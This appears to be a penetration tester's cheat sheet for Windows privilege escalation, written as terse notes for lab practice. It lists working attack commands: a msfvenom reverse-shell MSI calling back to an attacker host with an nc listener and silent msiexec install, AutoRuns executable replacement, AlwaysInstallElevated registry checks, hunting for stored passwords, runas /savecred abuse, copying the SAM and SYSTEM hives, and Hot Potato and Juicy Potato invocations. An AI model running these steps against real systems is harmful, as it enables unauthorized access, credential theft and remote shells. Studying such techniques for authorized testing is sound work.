Windows
Check user (whoami) and groups (net user <username>)
Run winPEAS with fast, searchfast, and cmd options.
Run Seatbelt & other script as well (PowerUP.ps1, SharpUp, etc)
If your scripts are failing and you don't know why, you can always run the manual commands from this source, and other Windows PrivEsc cheatsheets
Strategy:
Spend some time and read over the result of your enumeration.
if WinPEAS or other tool finds something interesting, make a note of it.
Avoid rabbit holes by creating a checklist of things you need for the priviledge escalation method to work.
Have a quick look around for files in user's desktop and other common location (ex: C:\ and C:\Program Files), Read through interesting files that you find, as they may contain useful information that could help escalate priviledge.
If you still don't have an admin shell, re-read your full enumeration dumps and highlight anything that seems odd. This might be a process or file name you aren't familiar with or even a username.
At this stage you can also start to think about Kernel Exploit.
Registry Exploits
AutoRuns -->
.\winPEASany.exe quite applicationinfo
search for Autorun Application(T1010)
check FilePerms: Everyone
ability to restart
AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
must set to 1.reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstalElevated
must set to 1.
AutoRuns
Change the Program.exe to the reverseShell.exe. then restart the computer to get the application run in the
manual check:
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
# check the directory permission
.\accesschk.exe /accepteula -wvu "<directory>"
AlwaysInstallElevated
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.x.y LPORT=53 -f msi -o reverse.msi
# nc -lvnp 53
execute the reverse shell:
msiexec /quite /qn /i reverse.msi
Service Exploits
Passwords
.\winPEASany.exe quite filesinfo userinfo
-> search for AutoLogon credentials(T1012)
login to other user in windows:
winexe -U 'admin%password123' //<target ip address> cmd.exe
# nt authority
winexe -U 'admin%password123' --system //<target ip address> cmd.exe
SaveCred
cmdkey /list
# exploit
runas /savecred /user:admin C:\Windows\Tasks\rev.exe
Password in Configuration
.\winPEASany.exe quite cmd searchfast filesinfo
search for --> possible known files that can contain creds(T1083&T1081)
or use this cmd command to find the creds:
dir /s *pass* == *.config
find /si password *.xml *.ini *.txt
SAM/SYSTEM Locations
file location:
dir c:\windows\system32\config
dir c:\windows\repair
dir c:\windows\system32\config\regback
or use winPEAS
.\winPEASany.exe quite cmd searchfast filesinfo
search for --> possible known files that can contain creds(T1083&T1081)
copy file SAM and SYSTEM to kali linux.
Scheduled Tasks
Insecure GUI Apps
Startup Apps
Installed Apps
Hot Potato
Windows 7,8,10, Server 2008, Server 2012
.\potato.exe -p 10.10.x.y -cmd "C:\Windows\Tasks\rev.exe" -enable_httpserver true -enable_defender true -enable_spoof true -enable_exhaust true
https://github.com/foxglovesec/Potato/tree/master/source/Potato/Potato/bin/Release
Juicy Potato
usually a service account
whoami /priv
-> SeImpersonatePrivilege Enabled
# .\Juicypotato.exe -l
.\JuicyPotato.exe -l 1337 -p C:\Windows\Tasks\rev.exe -t * -c <CLSID>
https://github.com/ohpe/juicy-potato https://jlajara.gitlab.io/Potatoes_Windows_Privesc
Port Forwarding
Kernel Exploits
Last updated